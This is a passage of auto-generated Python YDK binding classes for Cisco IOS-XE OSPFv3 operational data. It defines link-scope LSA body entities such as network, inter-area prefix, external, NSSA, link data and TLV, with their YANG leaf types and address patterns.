OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix() self.prefix.parent = self self._children_name_map["prefix"] = "prefix" self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): """ OSPFv3 network .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_net_options Network LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): """ OSPFv3 inter area prefix .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ia_prefix Inter area Prefix **type**\: str **config**\: False .. attribute:: ia_prefix_options Inter area prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): """ OSPFv3 inter area router .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: destination_router_id Router ID of the router being described by the LSA **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_ia_options Inter area LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): """ OSPFv3 LSA external .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, self).__init__() self.yang_name = "lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): """ OSPFv3 NSSA .. attribute:: lsa_nssa_external NSSA LSA **type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): """ NSSA LSA .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value) class LinkData(Entity): """ OSPFv3 Link data .. attribute:: rtr_priority Router priority of the interce **type**\: int **range:** 0..255 **config**\: False .. attribute:: link_local_interface_address The originating router's link\-local interface address on the link **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_id_options Link data LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None self.lsa_id_options = Bits() self._segment_path = lambda: "link-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value) class IaPrefix(Entity): """ OSPFv3 Intra area prefixes .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_adv_router Referenced Advertising Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = None self._segment_path = lambda: "ia-prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): """ OSPFv3 links .. attribute:: interface_id (key) Interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_interface_id (key) Neighbor interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_router_id (key) Neighbor router ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: metric Metric **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3PrefixList(Entity): """ OSPFv3 prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, self).__init__() self.yang_name = "ospfv3-prefix-list" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix-list" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): """ OSPFv3 intra\-area prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value) class MultiTopology(Entity): """ OSPF multi\-topology interface augmentation .. attribute:: name (key) One of the topology enabled on this interface **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology, self).__init__() self.yang_name = "multi-topology" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ]) self.name = None self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology, ['name'], name, value) class Tlv(Entity): """ Link TLV .. attribute:: link_type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: link_id Link ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: local_if_ipv4_addr List of local interface IPv4 addresses **type**\: union of the below types: **type**\: list of str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: list of str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: local_remote_ipv4_addr List of remote interface IPv4 addresses **type**\: union of the below types: **type**\: list of str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: list of str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: te_metric TE metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: max_bandwidth Maximum bandwidth **type**\: :py:class:`Decimal64<ydk.types.Decimal64>` **range:** \-92233720368547758.08..92233720368547758.07 **config**\: False .. attribute:: max_reservable_bandwidth Maximum reservable bandwidth **type**\: :py:class:`Decimal64<ydk.types.Decimal64>` **range:** \-92233720368547758.08..92233720368547758.07 **config**\: False .. attribute:: unreserved_bandwidth Unrseerved bandwidth **type**\: :py:class:`Decimal64<ydk.types.Decimal64>` **range:** \-92233720368547758.08..92233720368547758.07 **config**\: False .. attribute:: admin_group Administrative group/Resource class/Color **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv, self).__init__() self.yang_name = "tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])), ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('local_if_ipv4_addr', (YLeafList(YType.str, 'local-if-ipv4-addr'), ['str','str'])), 